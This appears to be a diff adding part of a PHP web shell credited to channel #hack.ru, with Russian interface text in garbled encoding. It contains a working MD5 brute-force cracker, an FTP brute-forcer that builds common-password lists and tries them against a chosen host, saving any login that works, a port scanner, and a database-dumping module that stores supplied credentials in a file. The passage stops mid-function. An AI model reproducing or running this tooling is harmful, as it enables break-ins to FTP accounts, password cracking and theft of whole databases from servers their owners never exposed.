+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:¹.,&quot;')>[Ñèìâîëû]</a><br><br>
+<font color=red><b><u>RUS:</u></b></font>
+<a class=menu href=javascript:ins('àáâãäå¸æçèéêëìíîïğñòóôõö÷øùúûüışÿ')>[à-ÿ]</a>
+<a class=menu href=javascript:ins('ÀÁÂÃÄŨÆÇÈÉÊËÌÍÎÏĞÑÒÓÔÕÖ×ØÙÚÛÜİŞß')>[À-ß]</a>
+</td></tr>
+<tr><td align=center width=400>
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+
+
+if($_POST[pass_de]){
+$pass_de=htmlspecialchars($pass_de);
+$pass_de=stripslashes($pass_de);
+$dat=date("H:i:s");
+$date=date("d:m:Y");
+
+crack_md5();
+}
+} 
+
+function crack_md5() {
+global $chars_de;
+$chars=$_POST[chars];
+set_time_limit(0);
+ignore_user_abort(1);
+$chars_de=str_replace("<",chr(60),$chars_de);
+$chars_de=str_replace(">",chr(62),$chars_de);
+$c=strlen($chars_de);
+for ($next = 0; $next <= 31; $next++) {
+for ($i1 = 0; $i1 <= $c; $i1++) {
+$word[1] = $chars_de{$i1};
+for ($i2 = 0; $i2 <= $c; $i2++) {
+$word[2] = $chars_de{$i2};
+if ($next <= 2) {
+result(implode($word));
+}else {
+for ($i3 = 0; $i3 <= $c; $i3++) {
+$word[3] = $chars_de{$i3};
+if ($next <= 3) {
+result(implode($word));
+}else {
+for ($i4 = 0; $i4 <= $c; $i4++) {
+$word[4] = $chars_de{$i4};
+if ($next <= 4) {
+result(implode($word));
+}else {
+for ($i5 = 0; $i5 <= $c; $i5++) {
+$word[5] = $chars_de{$i5};
+if ($next <= 5) {
+result(implode($word));
+}else {
+for ($i6 = 0; $i6 <= $c; $i6++) {
+$word[6] = $chars_de{$i6};
+if ($next <= 6) {
+result(implode($word));
+}else {
+for ($i7 = 0; $i7 <= $c; $i7++) {
+$word[7] = $chars_de{$i7};
+if ($next <= 7) {
+result(implode($word));
+}else {
+for ($i8 = 0; $i8 <= $c; $i8++) {
+$word[8] = $chars_de{$i8};
+if ($next <= 8) {
+result(implode($word));
+}else {
+for ($i9 = 0; $i9 <= $c; $i9++) {
+$word[9] = $chars_de{$i9};
+if ($next <= 9) {
+result(implode($word));
+}else {
+for ($i10 = 0; $i10 <= $c; $i10++) {
+$word[10] = $chars_de{$i10};
+if ($next <= 10) {
+result(implode($word));
+}else {
+for ($i11 = 0; $i11 <= $c; $i11++) {
+$word[11] = $chars_de{$i11};
+if ($next <= 11) {
+result(implode($word));
+}else {
+for ($i12 = 0; $i12 <= $c; $i12++) {
+$word[12] = $chars_de{$i12};
+if ($next <= 12) {
+result(implode($word));
+}else {
+for ($i13 = 0; $i13 <= $c; $i13++) {
+$word[13] = $chars_de{$i13};
+if ($next <= 13) {
+result(implode($word));
+}else {
+for ($i14 = 0; $i14 <= $c; $i14++) {
+$word[14] = $chars_de{$i14};
+if ($next <= 14) {
+result(implode($word));
+}else {
+for ($i15 = 0; $i15 <= $c; $i15++) {
+$word[15] = $chars_de{$i15};
+if ($next <= 15) {
+result(implode($word));
+}else {
+for ($i16 = 0; $i16 <= $c; $i16++) {
+$word[16] = $chars_de{$i16};
+if ($next <= 16) {
+result(implode($word));
+}else {
+for ($i17 = 0; $i17 <= $c; $i17++) {
+$word[17] = $chars_de{$i17};
+if ($next <= 17) {
+result(implode($word));
+}else {
+for ($i18 = 0; $i18 <= $c; $i18++) {
+$word[18] = $chars_de{$i18};
+if ($next <= 18) {
+result(implode($word));
+}else {
+for ($i19 = 0; $i19 <= $c; $i19++) {
+$word[19] = $chars_de{$i19};
+if ($next <= 19) {
+result(implode($word));
+}else {
+for ($i20 = 0; $i20 <= $c; $i20++) {
+$word[20] = $chars_de{$i20};
+if ($next <= 20) {
+result(implode($word));
+}else {
+for ($i21 = 0; $i21 <= $c; $i21++) {
+$word[21] = $chars_de{$i21};
+if ($next <= 21) {
+result(implode($word));
+}else {
+for ($i22 = 0; $i22 <= $c; $i22++) {
+$word[22] = $chars_de{$i22};
+if ($next <= 22) {
+result(implode($word));
+}else {
+for ($i23 = 0; $i23 <= $c; $i23++) {
+$word[23] = $chars_de{$i23};
+if ($next <= 23) {
+result(implode($word));
+}else {
+for ($i24 = 0; $i24 <= $c; $i24++) {
+$word[24] = $chars_de{$i24};
+if ($next <= 24) {
+result(implode($word));
+}else {
+for ($i25 = 0; $i25 <= $c; $i25++) {
+$word[25] = $chars_de{$i25};
+if ($next <= 25) {
+result(implode($word));
+}else {
+for ($i26 = 0; $i26 <= $c; $i26++) {
+$word[26] = $chars_de{$i26};
+if ($next <= 26) {
+result(implode($word));
+}else {
+for ($i27 = 0; $i27 <= $c; $i27++) {
+$word[27] = $chars_de{$i27};
+if ($next <= 27) {
+result(implode($word));
+}else {
+for ($i28 = 0; $i28 <= $c; $i28++) {
+$word[28] = $chars_de{$i28};
+if ($next <= 28) {
+result(implode($word));
+}else {
+for ($i29 = 0; $i29 <= $c; $i29++) {
+$word[29] = $chars_de{$i29};
+if ($next <= 29) {
+result(implode($word));
+}else {
+for ($i30 = 0; $i30 <= $c; $i30++) {
+$word[30] = $chars_de{$i30};
+if ($next <= 30) {
+result(implode($word));
+}else {
+for ($i31 = 0; $i31 <= $c; $i31++) {
+$word[31] = $chars_de{$i31};
+if ($next <= 31) {
+result(implode($word));
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+function result($word) {
+global $dat,$date;
+$pass_de=$_POST[pass_de];
+$dat2=date("H:i:s");
+$date2=date("d:m:Y");
+
+if(md5($word)==$pass_de){ 
+print "
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Ğåçóëüòàò âûïîëíåíèÿ ïåğåáîğà ïàğîëåé:</td></tr>
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>Çàõåøèğîâàííûé ïàğîëü:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Íà÷àëî ïåğåáîğà:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Îêîí÷àíèå ïåğåáîğà:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;Âûïîëíåíèå ïåğåáîğà õåøåé çàïèñàí â ôàéë:  <b>".$word."_md5</b></td></tr>
+</table>
+                            ";
+							$f=@fopen($word._md5,"a+");
+                            fputs($f,"Õıø èç MD5 [$pass_de] = $word\nÍà÷àëî ïåğåáîğà:\t$dat - $date\nÎêîí÷àíèå ïåğåáîğà:\t$dat2 - $date2\n ");
+                             exit;}
+
+
+
+}
+
+function brut_ftp() {
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+set_time_limit(0);
+ignore_user_abort(1);
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Áğóòôîğñåğ ÔÒÏ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>Ñ ïîìîùüş äàííîãî áğóòôîğñåğà âû ñìîæåòå ïîäîáğàòü ïàğîëü ê ëşáîìó õîñòèíãó áåç ïğîáëåì, ÷òîáû áûëî ÷òî ïåğåáèğàòü ÿ äîáàâèë áàçó
+ïàğîëåé, êîòîğàÿ ãåíåğèğóåòñÿ íà ëåòó ( íå ïèøèòå áîëüøèå öèôğû â <b>êîëëè÷åñòâå ïàğîëåé</b> òàê êàê ıòî ñåğüåçíàÿ íàãğóçêà íà ñåğâåğ 10000 âïîëíå õâàòèò) . </blockquote></td></tr>
+</table>";
+
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+ &nbsp;&nbsp;<b>Brutforcer Ftp</b>(ïîëíîöåííûé áğóòôîğñåğ, êîòîğûé ğàáîòàåò ïî ìåòîäó ïîäñòàíîâêè ïàğîëåé, êîòîğûå áåğåò èç ôàéëà, ôàéë ãåíåğèğóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàğîëåé è âñå ïåğåáîğ íà÷èíàåòñÿ!!!)</td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êîëëè÷åñòâî ïàğîëåé:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ïàğîëü äëÿ ïğîâåğêè:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+<tr><td width=500 align=center colspan=2><input type='submit' value='Brut FTP' class=button1 $style_button>
+</td></tr>
+ 
+ </form></table>";
+ 
+ 
+function s() {
+   $word="qwrtypsdfghjklzxcvbnm";
+   return $word[mt_rand(0,strlen($word)-1)];
+}
+
+function g() {
+   $word="euioam";
+   return $word[mt_rand(0,strlen($word)-2)];
+}
+
+function name0() {   return s().g().s();                        }
+function name1() {   return s().g().s().g();                    }
+function name2() {   return s().g().g().s();                    }
+function name3() {   return s().s().g().s().g();                }
+function name4() {   return g().s().g().s().g();                }
+function name5() {   return g().g().s().g().s();                }
+function name6() {   return g().s().s().g().s();                }
+function name7() {   return s().g().g().s().g();                }
+function name8() {   return s().g().s().g().g();                }
+function name9() {   return s().g().s().g().s().g();            }
+function name10() {   return s().g().s().s().g().s().s();        }
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+function randword() {
+   global $cool;
+   $func="name".mt_rand(0,11);
+   $func2="name".mt_rand(0,11);
+   switch (mt_rand(0,11)) {
+      case 0: return $func().mt_rand(5,99);
+      case 1: return $func()."-".$func2();
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+      case 3: return $func()."!".$func();
+      case 4: return randpass(mt_rand(5,12));
+      default: return $func();
+   }
+ 
+ 
+}
+
+function randpass($len) {
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+   $s="";
+   for ($i=0; $i<$len; $i++) {
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+   }
+   return $s;
+}
+if (@unlink("pass.txt") < 0){
+echo "íåòó íè÷åãî";
+exit;
+}
+$file="pass.txt"; 
+if($file && $host && $login){
+   $cn=mt_rand(30,30);
+for ($i=0; $i<$cn; $i++) {
+   $s=$cool2[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$s\n");
+   }
+ 
+  $cnt2=mt_rand(43,43);
+for ($i=0; $i<$cnt2; $i++) {
+   $r=$cool[$i];
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$login$r\n");
+}    
+$p="$proverka";
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$p\n");
+   
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+   $f=@fopen(pass.".txt","a+");
+   fputs($f,"$u\n");
+  } 
+  
+  if(is_file($file)){
+ $passwd=file($file,1000);
+  for($i=0; $i<count($passwd); $i++){
+   $stop=false;
+   $password=trim($passwd[$i]);
+   $open_ftp=@fsockopen($host,21);
+    if($open_ftp!=false){
+     fputs($open_ftp,"user $login\n");
+     fputs($open_ftp,"pass $password\n");
+     while(!feof($open_ftp) && $stop!=true){
+      $text=fgets($open_ftp,4096);
+      if(preg_match("/230/",$text)){
+       $stop=true;
+	   $f=@fopen($host._ftp,"a+");
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+       echo "
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäğàâëÿş!!! Ïàğîëü ïîäîáğàí.</font></b><br>
+&nbsp;&nbsp;Êîíåêò: <b>$host</b><br>&nbsp;&nbsp;Ëîãèí: <b>$login</b><br>&nbsp;&nbsp;Ïàğîëü: <b>$password</b></td></tr></table>
+";exit;
+      }
+      elseif(preg_match("/530/",$text)){
+       $stop=true;
+      
+      }
+     }
+     fclose($open_ftp);
+   }else{
+    echo "
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íå âåğíî óêàçàíî ôòï õîñòèíãà!!! Íà <b><u>$host</u></b> çàêğûò 21 ïîğò</b></b></td></tr>
+</table>
+";exit;
+   }
+  }
+ }
+}
+
+}
+
+# Ïîğòñêàí
+function portscan() {
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+ $mtime = explode(" ",microtime());
+ $mtime = $mtime[1] + $mtime[0];
+ $time1 = $mtime;
+
+ $id = $HTTP_HOST;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Ğåçóëüòàòû ñêàíèğîâàíèÿ:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Ñêàíèğóåì õîñòèíã íà íàëè÷èå îòêğûòûõ ïîğòîâ" . "...<br></td></tr></table>";
+
+ $lport = $min; 
+ $hport = $max; 
+ $op = 0;
+ $gp = 0;
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4); 
+  if ( !$fp ) { $gp++; }
+  else {
+   $port_addres = $port[$porta];
+   if($port_addres == "") $port_addres = "unknown";
+   $serv = getservbyport($porta, TCP);
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>×òî ıòî?</a>)</td></tr>";
+   $op++;
+  } 
+ } 
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íà äàííîì õîñòèíãå íåò îòêğûòûõ ïîğòîâ</b></td></tr></table>";
+
+ $unsi = ($op/$porta)*100;
+ $unsi = round($unsi);
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Ñòàòèñòèêà ñêàíèğîâàíèÿ:</b></b></td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>Ïğîñêàíèğîâàííûõ ïîğòîâ:</b>&nbsp;&nbsp;$porta</td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>Îòêğûòûõ ïîğòîâ:</b>&nbsp;&nbsp;$op</td></tr>";
+ echo "<tr><td align=center width=100% colspan=3><b>Çàêğûòûõ ïîğòîâ:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+ $mtime = explode(" ",microtime());
+ $mtime = $mtime[1] + $mtime[0];
+ $time2 = $mtime;
+ $loadtime = ($time2 - $time1); 
+ $loadtime = round($loadtime, 2); 
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Âğåìÿ ñêàíèğîâàíèÿ:</b>&nbsp;&nbsp;$loadtime ñåêóíä</tr></table>";
+}
+
+function nfm_copyright() {
+global $action;
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+  
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+// SQL functions start
+function aff_date() {
+ $date_now=date("F j,Y,g:i a");
+ return $date_now;
+} 
+
+function sqldumptable($table) {
+ global $sv_s,$sv_d,$drp_tbl;
+ $tabledump = "";
+ if ($sv_s) {
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; } 
+  $tabledump.="CREATE TABLE $table (\n";
+  $firstfield=1;
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+  while ($champ=mysql_fetch_array($champs)) {
+   if (!$firstfield) { $tabledump.=",\n"; } 
+   else { $firstfield=0;}
+   $tabledump.=" $champ[Field] $champ[Type]";
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";} 
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";} 
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+  }
+  
+  @mysql_free_result($champs);
+  $keys=mysql_query("SHOW KEYS FROM $table");
+  while ($key=mysql_fetch_array($keys)) {
+   $kname=$key['Key_name'];
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+   $index[$kname][]=$key['Column_name'];
+  }
+ 
+  @mysql_free_result($keys);
+  while(list($kname,$columns)=@each($index)) {
+   $tabledump.=",\n";
+   $colnames=implode($columns,",");
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+   else {
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+    $tabledump.=" KEY $kname ($colnames)";
+   }
+  }
+  $tabledump.="\n);\n\n";
+ }
+
+ if ($sv_d) {
+  $rows=mysql_query("SELECT * FROM $table");
+  $numfields=mysql_num_fields($rows);
+  while ($row=mysql_fetch_array($rows)) {
+   $tabledump.="INSERT INTO $table VALUES(";
+   $cptchamp=-1;
+   $firstfield=1;
+   while (++$cptchamp<$numfields) {
+    if (!$firstfield) { $tabledump.=",";} 
+    else { $firstfield=0;}
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";} 
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+   }
+   $tabledump.=");\n";
+  }
+  @mysql_free_result($rows);
+ } 
+
+ return $tabledump;
+} 
+
+function csvdumptable($table) {
+ global $sv_s,$sv_d;
+ $csvdump="## Table:$table \n\n";
+ if ($sv_s) {
+  $firstfield=1;
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+  while ($champ=mysql_fetch_array($champs)) {
+   if (!$firstfield) { $csvdump.=",";} 
+   else { $firstfield=0;}
+   $csvdump.="'".$champ['Field']."'";
+  }
+
+  @mysql_free_result($champs);
+  $csvdump.="\n";
+ }
+
+ if ($sv_d) {
+  $rows=mysql_query("SELECT * FROM $table");
+  $numfields=mysql_num_fields($rows);
+  while ($row=mysql_fetch_array($rows)) {
+   $cptchamp=-1;
+   $firstfield=1;
+   while (++$cptchamp<$numfields) { 
+    if (!$firstfield) { $csvdump.=",";} 
+    else { $firstfield=0;}
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+   }
+   $csvdump.="\n";
+  }
+ }
+
+ @mysql_free_result($rows);
+ return $csvdump;
+} 
+
+function write_file($data) {
+ global $g_fp,$file_type;
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+ else { fwrite ($g_fp,$data); }
+}
+
+function open_file($file_name) {
+ global $g_fp,$file_type,$dbbase,$f_nm;
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); } 
+ else { $g_fp=fopen ($file_name,"w"); } 
+
+ $f_nm[]=$file_name;
+ $data="";
+ $data.="##\n";
+ $data.="## NFM hack.ru creator \n";
+ $data.="##-------------------------\n";
+ $data.="## Date:".aff_date()."\n";
+ $data.="## Base:$dbbase \n";
+ $data.="##-------------------------\n\n";
+ write_file($data);
+ unset($data);
+}
+ 
+function file_pos() {
+ global $g_fp,$file_type;
+ if ($file_type=="1") { return gztell ($g_fp); }
+ else { return ftell ($g_fp); }
+}
+ 
+function close_file() {
+ global $g_fp,$file_type;
+ if ($file_type=="1") { gzclose ($g_fp); }
+ else { fclose ($g_fp); }
+}
+
+function split_sql_file($sql) {
+ $morc=explode(";",$sql);
+ $sql="";
+ $output=array();
+ $matches=array();
+ $morc_cpt=count($morc);
+ for ($i=0;$i < $morc_cpt;$i++) {
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+   else {
+    $temp=$morc[$i].";";
+    $morc[$i]="";
+    $complete_stmt=false;
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+     if (($unescaped_quotes % 2)==1) {
+      $output[]=$temp.$morc[$j];
+      $morc[$j]="";
+      $temp="";
+      $complete_stmt=true;
+      $i=$j;
+     } else {
+      $temp.=$morc[$j].";";
+      $morc[$j]="";
+     }
+    }
+   }
+  }
+ }
+ return $output;
+} 
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+// SQL functions END
+
+// main SQL()
+function sql() {
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+ $secu_config="xtdump_conf.inc.php";
+ $dbhost=$_POST['dbhost'];
+ $dbuser=$_POST['dbuser'];
+ $dbpass=$_POST['dbpass'];
+ $dbbase=$_POST['dbbase'];
+ $tbls =$_POST['tbls'];
+ $sqlaction =$_POST['sqlaction'];
+ $secu =$_POST['secu'];
+ $f_cut =$_POST['f_cut'];
+ $max_sql =$_POST['max_sql'];
+ $opt =$_POST['opt'];
+ $savmode =$_POST['savmode'];
+ $file_type =$_POST['file_type'];
+ $ecraz =$_POST['ecraz'];
+ $f_tbl =$_POST['f_tbl'];
+ $drp_tbl=$_POST['drp_tbl'];
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-íàçàä-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+ // SQL actions STARTS
+
+ if ($sqlaction=='save') {
+  if ($secu==1) {
+   $fp=fopen($secu_config,"w");
+   fputs($fp,"<?php\n");
+   fputs($fp,"\$dbhost='$dbhost';\n");
+   fputs($fp,"\$dbbase='$dbbase';\n");
+   fputs($fp,"\$dbuser='$dbuser';\n");
+   fputs($fp,"\$dbpass='$dbpass';\n");
+   fputs($fp,"?>");
+   fclose($fp);
+  }
+  if (!is_array($tbls)) {
+   echo $header."
+<br><center><font color=red>ÒÛ ÇÀÁÛË âûäåëèòü íóæíûå òåáå òàáëèöû äëÿ äàìïèíãà =)</b></font></center>\n$footer";
+   exit;
+  }
+  if($f_cut==1) {
+   if (!is_numeric($max_sql)) {
+    echo $header."<br><center><font color=red><b>Îøèáêà.</b></font></center>\n$footer";
+    exit;
+   }
+   if ($max_sql < 200000) {
+    echo $header."<br><center><font color=red><b>áàçà sql áîëüøå 200 000 ìá</b></font></center>\n$footer";
+    exit;
+   }
+  } 
+ 
+  $tbl=array();
+  $tbl[]=reset($tbls);
+  if (count($tbls) > 1) {
+   $a=true;
+   while ($a !=false) {
+    $a=next($tbls);
+    if ($a !=false) { $tbl[]=$a; } 
+   }
+  }
+ 
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; } 
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+  else { exit; }
+ 
+  $fext=".".$savmode;
+  $fich=$dbbase.$fc.$fext;
+  $dte="";
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+  if ($file_type=='1') { $gz.=".gz"; }
+  $fcut=false;
+  $ftbl=false;
+  $f_nm=array();
+  if($f_cut==1) { $fcut=true;$max_sql=$max_sql;$nbf=1;$f_size=170;}
+  if($f_tbl==1) { $ftbl=true; }
+  else {
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+  }
+ 
+  $nbf=1;
+  mysql_connect($dbhost,$dbuser,$dbpass);
+  mysql_select_db($dbbase);
+  if ($fext==".sql") {
+   if ($ftbl) { 		
+    while (list($i)=each($tbl)) {
+     $temp=sqldumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut) {
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+      $nbf=0;
+      $p_sql=split_sql_file($temp);
+      while(list($j,$val)=each($p_sql)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val.";"); }
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+      }
+      close_file();
+     }
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   } else {
+    $tblsv="";
+    while (list($i)=each($tbl)) {
+     $temp=sqldumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut && ((file_pos()+$sz_t) > $max_sql)) {
+      $p_sql=split_sql_file($temp);
+      while(list($j,$val)=each($p_sql)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val.";"); }
+       else {
+        close_file();
+        $nbf++;
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+        write_file($val.";");
+       }
+      }
+     } else { write_file($temp); }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   }
+  }
+  else if ($fext==".csv") {
+   if ($ftbl) {
+    while (list($i)=each($tbl)) {
+     $temp=csvdumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut) {
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+      $nbf=0;
+      $p_csv=split_csv_file($temp);
+      while(list($j,$val)=each($p_csv)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val."\n"); }
+       else {
+        close_file();
+        $nbf++;
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+        write_file($val."\n");
+       }
+      }
+      close_file();
+     } else {
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+      write_file($temp."\n\n");
+      close_file();
+      $nbf=1;
+     }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   } else {
+    while (list($i)=each($tbl)) {
+     $temp=csvdumptable($tbl[$i]);
+     $sz_t=strlen($temp);
+     if ($fcut && ((file_pos()+$sz_t) > $max_sql)) {
+      $p_csv=split_sql_file($temp);
+      while(list($j,$val)=each($p_csv)) {
+       if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val."\n"); }
+       else {
+        close_file();
